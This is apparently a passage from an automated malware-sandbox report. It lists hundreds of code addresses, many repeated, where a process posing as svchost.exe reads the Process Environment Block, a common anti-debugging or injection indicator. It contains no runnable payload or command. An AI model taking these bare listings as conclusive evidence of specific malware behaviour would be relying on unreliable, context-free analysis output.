                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
